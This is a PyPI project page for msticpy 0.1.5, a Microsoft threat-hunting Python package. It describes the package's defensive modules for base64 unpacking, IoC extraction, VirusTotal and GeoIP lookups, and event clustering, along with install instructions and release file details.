Skip to main content

MSTIC Security Tools

Project description

MIT License Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE Description: # MSTIC Jupyter and Python Security Tools

Microsoft Threat Intelligence Python Security Tools.

The msticpy package was initially developed to supported Jupyter Notebook authoring for [Azure Sentinel](https://azure.microsoft.com/en-us/services/azure-sentinel/). However, many of the components can be used in other security scenarios for threat hunting and threat investigation. There are three main sub-packages:

  • sectools - python security tools to help with data analysis or investigation

  • nbtools - Jupyter-specific UI tools such as widgets and data display

  • data - data interfaces specific to Sentinel/Log Analytics

The package is in an early preview mode so there are likely to be bugs and there are several that are not yet optimized for performance. We welcome feedback, bug reports and suggestions for new features.

## Installing

pip install msticpy

or for the latest dev build

pip install git+https://github.com/microsoft/msticpy

## Documentation

The public functions, classes and public class methods have docstrings that describe the parameters and, for more complex functions give a more detailed description of functionality and outputs. We are in the process of producing more formal documentation on read-the-docs.

Until then, the functionality is described in the following sections and accompanying notebooks. You can also browse through the sample notebooks (especially the Windows Alert Investigation notebook) to see some of the functionality used in context.

## Security Tools Sub-package - sectools

This subpackage contains several modules helpful for working on security investigations and hunting:

### base64unpack

Base64 and archive (gz, zip, tar) extractor. Input can either be a single string or a specified column of a pandas dataframe. It will try to identify any base64 encoded strings and decode them. If the result looks like one of the supported archive types it will unpack the contents. The results of each decode/unpack are rechecked for further base64 content and will recurse down up to 20 levels (default can be overridden). Output is to a decoded string (for single string input) or a DataFrame (for dataframe input).

[Base64Unpack Notebook](./doc/Base64Unpack.ipynb)

### iocextract

Uses a set of builtin regular expressions to look for Indicator of Compromise (IoC) patterns. Input can be a single string or a pandas dataframe with one or more columns specified as input.

The following types are built-in:

  • IPv4 and IPv6

  • URL

  • DNS domain

  • Hashes (MD5, SHA1, SHA256)

  • Windows file paths

  • Linux file paths (this is kind of noisy because a legal linux file path can have almost any character)

You can modify or add to the regular expressions used at runtime.

Output is a dictionary of matches (for single string input) or a DataFrame (for dataframe input).

[Base64Unpack Notebook](./doc/IoCExtract.ipynb)

### vtlookup

Wrapper class around [Virus Total API](https://www.virustotal.com/en/documentation/public-api/). Input can be a single IoC observable or a pandas DataFrame containing multiple observables. Processing requires a Virus Total account and API key and processing performance is limited to the number of requests per minute for the account type that you have. Support IoC Types:

  • Filehash

  • URL

  • DNS Domain

  • IPv4 Address

[VTLookup Notebook](./doc/VirusTotalLookup.ipynb)

### geoip

Geographic location lookup for IP addresses. This module has two classes for different services:

Both services offer a free tier for non-commercial use. However, a paid tier will normally get you more accuracy, more detail and a higher throughput rate. Maxmind geolite uses a downloadable database, while IPStack is an online lookup (API key required).

[GeoIP Lookup Notebook](./doc/GeoIPLookups.ipynb)

### eventcluster

This module is intended to be used to summarize large numbers of events into clusters of different patterns. High volume repeating events can often make it difficult to see unique and interesting items.

The module contains functions to generate clusterable features from string data. For example, an administration command that does some maintenance on thousands of servers with a commandline such as:<br> ` install-update -hostname {host.fqdn} -tmp:/tmp/{GUID}/rollback `

can be collapsed into a single cluster pattern by ignoring the character values in the string and using delimiters or tokens to group the values.

This is an unsupervised learning module implemented using SciKit Learn DBScan.

### outliers

Similar to the eventcluster module but a little bit more experimental (read ‘less tested’). It uses SkLearn Isolation Forest to identify outlier events in a single data set or using one data set as training data and another on which to predict outliers.

### auditdextract

Module to load and decode Linux audit logs. It collapses messages sharing the same message ID into single events, decodes hex-encoded data fields and performs some event-specific formatting and normalization (e.g. for process start events it will re-assemble the process command line arguments into a single string). This is still a work-in-progress.

## Notebook tools sub-package - nbtools

This is a collection of display and utility modules designed to make working with security data in Jupyter notebooks quicker and easier.

  • nbwidgets - groups common functionality such as list pickers, time boundary settings, saving and retrieving environment variables into a single line callable command.

  • nbdisplay - functions that implement common display of things like alerts, events in a slightly more consumable way than print()

  • entityschema - implements entity classes (e.g. Host, Account, IPAddress) used in Log Analytics alerts and in many of these modules. Each entity encaspulates one or more properties related to the entity.

[Notebooks Tools](./doc/NotebookWidgets.ipynb)

## Data sub-package - data

These components are currently still part of the nbtools sub-package but will be refactored to separate them into their own package.

  • query manager - collection of modules that implement common kql/Log Analytics queries using KqlMagic

  • security_alert and security_event - encapsulation classes for alerts and events. Each has a standard ‘entities’ property reflecting the entities found in the alert or event. These can also be used as meta-parameters for many of the queries. For example the query: qry.list_host_logons(provs==[query_times, alert]) will extract the value for the hostname query parameter from the alert.

## Clone the notebooks in this repo to Azure Notebooks

Requires sign-in to Azure Notebooks <a href=”https://notebooks.azure.com/import/gh/Microsoft/msticpy”><img src=”https://notebooks.azure.com/launch.png” /></a>

## More Notebook Examples

See the following notebooks for more examples of the use of this package in practice:

## To-Do Items

## Supported Platforms and Packages

  • msticpy is OS-independent

  • Requires Python 3.6 or later

  • Requires the following python packages: pandas, bokeh, matplotlib, seaborn, setuptools, urllib3, ipywidgets, numpy, attrs, requests, networkx, ipython, scikit_learn, typing

  • The following packages are recommended and needed for some specific functionality: Kqlmagic, maxminddb_geolite2, folium, dnspython, ipwhois

See [requirements.txt](requirements.txt) for more details and version requirements.

## Contributing

This project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit <https://cla.microsoft.com>.

When you submit a pull request, a CLA-bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., label, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA.

This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). For more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments.

Keywords: security,azure Platform: UNKNOWN Classifier: Programming Language :: Python :: 3.6 Classifier: License :: OSI Approved :: MIT License Classifier: Operating System :: OS Independent Requires-Python: >=3.6 Description-Content-Type: text/markdown

Project details


Release history Release notifications | RSS feed

This version

0.1.5

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

msticpy-0.1.5.tar.gz (89.0 kB view details)

Uploaded Source

Built Distribution

msticpy-0.1.5-py3-none-any.whl (105.4 kB view details)

Uploaded Python 3

File details

Details for the file msticpy-0.1.5.tar.gz.

File metadata

  • Download URL: msticpy-0.1.5.tar.gz
  • Upload date:
  • Size: 89.0 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/1.13.0 pkginfo/1.5.0.1 requests/2.21.0 setuptools/40.6.2 requests-toolbelt/0.9.1 tqdm/4.31.1 CPython/3.6.8

File hashes

Hashes for msticpy-0.1.5.tar.gz
Algorithm Hash digest
SHA256 20a1a72aaea4eeeacb59083aab27381355fb56ccec10e2b20dba15d43700585c
MD5 c69bde953616ddc6a9732e27625eff86
BLAKE2b-256 5f782bdd8ae3fec900fc8828b7d73c419536c6b816ae23fc3a3377359f8976c1

See more details on using hashes here.

File details

Details for the file msticpy-0.1.5-py3-none-any.whl.

File metadata

  • Download URL: msticpy-0.1.5-py3-none-any.whl
  • Upload date:
  • Size: 105.4 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/1.13.0 pkginfo/1.5.0.1 requests/2.21.0 setuptools/40.6.2 requests-toolbelt/0.9.1 tqdm/4.31.1 CPython/3.6.8

File hashes

Hashes for msticpy-0.1.5-py3-none-any.whl
Algorithm Hash digest
SHA256 3db619dd730035e9df9a3bbc9d44c9ffe1d9eac38a9259c402de687eb480f83e
MD5 c676fe63d83621eaea263d111e42036c
BLAKE2b-256 00159ae4832ef963d2100eba8a638cdbb82949c6fa424231bd82bc0a62d835d9

See more details on using hashes here.

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page